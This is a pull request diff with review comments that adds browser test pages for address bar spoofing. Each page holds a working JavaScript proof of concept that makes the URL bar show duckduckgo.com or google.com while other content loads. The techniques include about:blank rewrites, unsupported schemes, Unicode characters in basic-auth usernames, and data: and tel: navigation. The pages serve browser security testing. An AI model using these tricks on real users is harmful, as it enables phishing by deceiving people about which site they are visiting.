Add Address Bar Spoofing Test Cases #169

Merged
merged 7 commits into from
Nov 8, 2023
2 changes: 1 addition & 1 deletion index.html
@@ -53,8 +53,8 @@ <h2>Browser Features</h2>
<h2>Security</h2>

<ul>
<li><a href="./security/address-bar-spoofing/">Address Bar Spoofing</a></li>
<li><a href="./security/dos-reload.html">Infinite location.reload() loop</a></li>
<li><a href="./security/spoof-js-page-rewrite.html">URL Spoofing - JS page rewrite</a></li>
<li><a href="./security/csp-report/index.html">Leak of extension IDs via CSP</a></li>
<li><a href="./security/js-leaks.html">Detect changes to JS objects in global scope</a></li>
<li><a href="./security/badware/phishing.html">An example phishing page</a></li>
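Review bot: The list in this hunk still shows the `./security/spoof-js-page-rewrite.html` entry ("URL Spoofing - JS page rewrite") next to the new `./security/address-bar-spoofing/` entry, while this PR deletes security/spoof-js-page-rewrite.html. Confirm that entry is the one deleted line here; if it stays, the root index links to a file that no longer exists. The new entry also points at a directory rather than at `index.html` as the `csp-report/index.html` entry does, so it relies on the server resolving directory indexes.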
22 changes: 22 additions & 0 deletions security/address-bar-spoofing/index.html
@@ -0,0 +1,22 @@
<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<title>Test Pages - Address Bar Spoofing</title>
</head>
<body>
<h1>Address Bar Spoofing Pages</h1>
<ul>
<li><a href="/security/address-bar-spoofing/spoof-about-blank-rewrite.html">About:Blank Rewrite Spoof</a></li>
<li><a href="/security/address-bar-spoofing/spoof-application-scheme.html">Unsupported Application Scheme Spoof</a></li>
<li><a href="/security/address-bar-spoofing/spoof-basicauth-2028.html">Basic Auth Parameter Spoof (\u2028)</a></li>
<li><a href="/security/address-bar-spoofing/spoof-basicauth-2029.html">Basic Auth Parameter Spoof (\u2029)</a></li>
<li><a href="/security/address-bar-spoofing/spoof-basicauth-whitespace.html">Basic Auth Parameter Spoof (Whitespace)</a></li>
<li><a href="/security/address-bar-spoofing/spoof-form-action.html">Form Action Spoof</a></li>
<li><a href="/security/address-bar-spoofing/spoof-js-download-url.html">Download URL Spoof</a></li>
<li><a href="/security/address-bar-spoofing/spoof-js-page-rewrite.html">Unsupported Application Scheme Spoof</a></li>
<li><a href="/security/address-bar-spoofing/spoof-open-b64-html.html">Unsupported Application Scheme Spoof</a></li>
<li><a href="/security/address-bar-spoofing/spoof-unsupported-scheme.html">Unsupported URL Scheme Spoof</a></li>
</ul>
</body>
</html>
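Review bot: Three entries in the list carry the label "Unsupported Application Scheme Spoof": spoof-application-scheme.html, spoof-js-page-rewrite.html and spoof-open-b64-html.html. The last two look like copy-paste and should be labelled after their own tests (their page titles are "Simple JS page rewrite" and "Base64 Document Load"). The `spoof-js-page-rewrite.html` href also does not match the file this PR adds, `spoof-js-page-rewrite-simple.html`, so that link will not resolve. Minor: these hrefs are root-absolute (`/security/...`) while the root index.html uses relative `./security/...` links, which breaks if the pages are served under a sub-path.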
29 changes: 29 additions & 0 deletions security/address-bar-spoofing/spoof-about-blank-rewrite.html
@@ -0,0 +1,29 @@
<!DOCTYPE html>
<html>

<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width">
<title>About:Blank Rewrite Spoof</title>
<script>
// eslint-disable-next-line no-unused-vars
function run() {
let win = open("about:blank");
win.document.write("<title>DuckDuckGo - Privacy, Simplified.</title>Not DDG.");
setTimeout(() => {
win.location = "https://duckduckgo.com/";
win.window.stop();
}, 500);
}
</script>
</head>

<body>
<p><a href="../index.html">[Home]</a></p>
This test will try to confuse the browser to show the wrong domain in the URL bar by opening an about:blank page,
rewriting the content, starting a navigation elsewhere and quickly stopping the
navigation using window.stop().
<button id="run" onclick="run()">Start</button>
</body>

</html>
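Review bot: In `run()`, `open("about:blank")` returns null when the popup is blocked, and `win.document.write(...)` then throws with nothing shown to the tester. Check the return value and put a visible message on the page when the window could not be opened. `win.window.stop()` can be written `win.stop()`, and the 500 ms delay would be clearer as a named constant with a comment on why the navigation is stopped at that point. The `[Home]` link `../index.html` resolves to security/index.html, which is neither the root index.html nor the index added in this directory; the same applies to the other pages in this PR.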
26 changes: 26 additions & 0 deletions security/address-bar-spoofing/spoof-application-scheme.html
@@ -0,0 +1,26 @@
<!DOCTYPE html>
<html>

<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width">
<title>URL Spoofing - Unsupported Application Scheme</title>
<script>
// eslint-disable-next-line no-unused-vars
function run() {
var t = window.open('filesystem:whatever', 'aa');
t.document.body.innerHTML = '<title>DuckDuckGo - Privacy Simplified</title><h1>Not DDG.</h1>';
}
</script>
</head>

<body>
<p><a href="../index.html">[Home]</a></p>
This test uses an unsupported application scheme and a href target to trick the browser into displaying the href
target as the current address bar value, while actually navigating to an attacker controlled page.
<a id="run" href="https://duckduckgo.com:" target="aa" onclick="setTimeout('run()',100)">
<h1>Start</h1>
</a>
</body>

</html>
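Review bot: `onclick="setTimeout('run()',100)"` on the `#run` link passes a string to setTimeout, which is evaluated like eval and stops working under a Content-Security-Policy without 'unsafe-eval'; pass the function instead, `setTimeout(run, 100)`. In `run()`, `window.open('filesystem:whatever', 'aa')` can return null, and `t.document` throws if the window named `aa` has already committed the cross-origin navigation to the href target, so guard both. The description should also say what the address bar is expected to show on a browser that handles this correctly.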
23 changes: 23 additions & 0 deletions security/address-bar-spoofing/spoof-basicauth-2028.html
@@ -0,0 +1,23 @@
<!DOCTYPE html>
<html>

<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width">
<title>URL Spoofing - Basic Auth Whitespace (2028)</title>
<script>
// eslint-disable-next-line no-unused-vars
function run() {
location = `https://www.google.com\u2028@example.com/`
}
</script>
</head>

<body>
<p><a href="../index.html">[Home]</a></p>
This test uses a unicode whitespace character (\u2028) inside the username field of the basicauth portion
of the URL to perform an address bar spoofing attack.
<button id="run" onclick="run()">run</button>
</body>

</html>
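Review bot: The title and description call U+2028 a whitespace character without naming it; it is LINE SEPARATOR, and saying so would make the three basic-auth variants easier to tell apart. The spoofed host in `run()` is `www.google.com`, while the other pages in this PR imitate duckduckgo.com, so pick one for consistency. The description should state the expected result, namely that the address bar shows `example.com`, the host after the `@`. The button label is "run" here and "Start" on other pages.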
23 changes: 23 additions & 0 deletions security/address-bar-spoofing/spoof-basicauth-2029.html
@@ -0,0 +1,23 @@
<!DOCTYPE html>
<html>

<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width">
<title>URL Spoofing - Basic Auth Whitespace (2029)</title>
<script>
// eslint-disable-next-line no-unused-vars
function run() {
location = `https://www.google.com\u2029@example.com/`
}
</script>
</head>

<body>
<p><a href="../index.html">[Home]</a></p>
This test uses a unicode whitespace character (\u2029) inside the username field of the basicauth portion
of the URL to perform an address bar spoofing attack.
<button id="run" onclick="run()">run</button>
</body>

</html>
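Review bot: This file differs from spoof-basicauth-2028.html only in the code point, which appears in `run()`, the title and the description. Consider a single page that takes the character as a parameter, or a shared script, so a fix to one variant is not missed in the other. As in the 2028 page, the `location = ...` statement lacks the trailing semicolon that spoof-basicauth-whitespace.html uses, and the template literal has no interpolation, so a plain string would do.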
24 changes: 24 additions & 0 deletions security/address-bar-spoofing/spoof-basicauth-whitespace.html
@@ -0,0 +1,24 @@
<!DOCTYPE html>
<html>

<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width">
<title>URL Spoofing - Basic Auth Whitespace Repeated</title>
<script>
// eslint-disable-next-line no-unused-vars
function run() {
var whitespaces = "\u3000".repeat(300);
location = `https://www.google.com${whitespaces}@example.com/`;
}
</script>
</head>

<body>
<p><a href="../index.html">[Home]</a></p>
This test uses 300 repeated unicode whitespace characters inside the username field of the basicauth portion
of the URL to perform an address bar spoofing attack.
<button id="run" onclick="run()">run</button>
</body>

</html>
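Review bot: `"\u3000".repeat(300)` in `run()` hard-codes both the character and the count with no comment on why 300 is enough to push the real host out of view; name the constant and say what it is sized against. The description mentions "300 repeated unicode whitespace characters" but not which one (U+3000, IDEOGRAPHIC SPACE). `var whitespaces` can be `const`, and the title "Basic Auth Whitespace Repeated" does not match the index label "Basic Auth Parameter Spoof (Whitespace)".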
26 changes: 26 additions & 0 deletions security/address-bar-spoofing/spoof-form-action.html
@@ -0,0 +1,26 @@
<!DOCTYPE html>
<html>

<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width">
<meta http-equiv="Content-Security-Policy" content="form-action https://duck.co" />
<title>URL Spoofing - Redirect Form Action</title>
<script>
// eslint-disable-next-line no-unused-vars
function run() {
document.forms[0].submit();
}
</script>
</head>

<body>
<p><a href="../index.html">[Home]</a></p>
This test uses a form action on a redirect URL to trick the browser into displaying the
redirect URL as the current address bar value, while trying to remain on the current page.
<button id="run" onclick="run()">run</button>
<form action="https://duck.co/">
</form>
</body>

</html>
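Review bot: The `form-action https://duck.co` policy in the `<meta>` tag allows the form's own action `https://duck.co/`, so the test only does something if that URL redirects to an origin outside the policy, which the description hints at ("a form action on a redirect URL") but the file never states. Add a comment naming the redirect this relies on and the role of the CSP, since the test silently changes meaning if the external redirect changes. The `<meta http-equiv=... />` tag is self-closed while the other `<meta>` tags in the file are not, and the empty `<form>` would be easier to find with an id than through `document.forms[0]`.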
26 changes: 26 additions & 0 deletions security/address-bar-spoofing/spoof-js-download-url.html
@@ -0,0 +1,26 @@
<!DOCTYPE html>
<html>

<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width">
<title>URL Spoofing - Download URL</title>
<script>
// eslint-disable-next-line no-unused-vars
function run() {
const w = open()
w.opener = null
w.document.write('<h1>Not Third Party Site.</h1>')
w.location = 'https://bad.third-party.site/features/download/file/pdf'
}
</script>
</head>

<body>
<p><a href="../index.html">[Home]</a></p>
This test uses a download URL for downloading a file to spoof the browser into displaying the download
URL as the current origin while rewriting the document content to spoof the address bar.
<button onclick="run()">Start</button>
</body>

</html>
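Review bot: The `<button onclick="run()">Start</button>` here has no `id="run"`, unlike the buttons in the about-blank, basic-auth and form-action pages; if the tests are driven by selecting `#run`, this page and the three that follow it will not be triggered. In `run()`, `open()` can return null when popups are blocked, in which case `w.opener = null` throws, so check the return value first. The statements in `run()` omit semicolons, which other pages in this PR use.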
26 changes: 26 additions & 0 deletions security/address-bar-spoofing/spoof-js-page-rewrite-simple.html
@@ -0,0 +1,26 @@
<!DOCTYPE html>
<html>

<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width">
<title>URL Spoofing - Simple JS page rewrite</title>
<script>
// eslint-disable-next-line no-unused-vars
function run () {
document.write('Not DDG.<br>');
document.location = 'https://duckduckgo.com:8443';
}
</script>
</head>

<body>
<p><a href="../index.html">[Home]</a></p>

This test will try to confuse the browser to show the wrong domain in the URL bar by rewriting the current page
content and loading a URL that will timeout.

<button onclick="run()">Start</button>
</body>

</html>
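Review bot: The test depends on `https://duckduckgo.com:8443` never answering, as the description says ("loading a URL that will timeout"). That is a property of a third-party host and of the tester's network: a refused connection or an intercepting proxy ends the navigation at once, and the test then no longer exercises the pending-navigation state. Add a comment in `run()` stating this assumption, or point at a host and port the project controls. `function run ()` also has a space before the parentheses that the other pages do not.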
31 changes: 31 additions & 0 deletions security/address-bar-spoofing/spoof-open-b64-html.html
@@ -0,0 +1,31 @@
<!DOCTYPE html>
<html>

<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width">
<title>URL Spoofing - Base64 Document Load</title>
<script>
// eslint-disable-next-line no-unused-vars
function run() {
w = open('data:text/html;base64,PHRpdGxlPkR1Y2tEdWNrR28gLSBQcml2YWN5LCBTaW1wbGlmaWVkPC90aXRsZT48aDE+Tm90IERERzwvaDE+Cg==')
setTimeout(function () {
w.location = 'tel://duckduckgo.com'
setTimeout(function () {
w.history.back()
}, 2100)
}, 2000)
}
</script>
</head>

<body>
<p><a href="../index.html">[Home]</a></p>

This test will try to confuse the browser to show the wrong domain in the URL bar by loading a static Base64
encoded document, rewriting the current page, and then navigating to a tel: URL.

<button onclick="run()">Start</button>
</body>

</html>
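Review bot: `w = open(...)` in `run()` assigns to an undeclared variable, which creates an implicit global and throws in strict mode; declare it with `const w`. The description says the test works by "rewriting the current page", but the script opens a new window from a `data:` URL and never rewrites anything, so the text should describe the open, `tel:` navigation and `history.back()` sequence the code performs. A comment giving the decoded content of the base64 payload, and named constants for the 2000 and 2100 ms delays, would make the page reviewable without decoding it by hand.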
24 changes: 24 additions & 0 deletions security/address-bar-spoofing/spoof-unsupported-scheme.html
@@ -0,0 +1,24 @@
<!DOCTYPE html>
<html>

<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width">
<title>URL Spoofing - Simple Location</title>
<script>
// eslint-disable-next-line no-unused-vars
function run() {
location = "httpx://www.duckduckgo.com";
}
</script>
</head>

<body>
<p><a href="../index.html">[Home]</a></p>

This is the most simple test for URL spoofing. Simply rewrite the current location using an unsupported scheme.

<button onclick="run()">Start</button>
</body>

</html>
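Review bot: The `<title>` is "URL Spoofing - Simple Location", while the file name and the index entry call this test "Unsupported URL Scheme Spoof"; align the title so the page can be matched to its index entry. The description should read "the simplest test" rather than "the most simple test", and it would help to say what a correct browser is expected to show after `location = "httpx://www.duckduckgo.com"` is assigned.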
35 changes: 0 additions & 35 deletions security/spoof-js-page-rewrite.html

This file was deleted.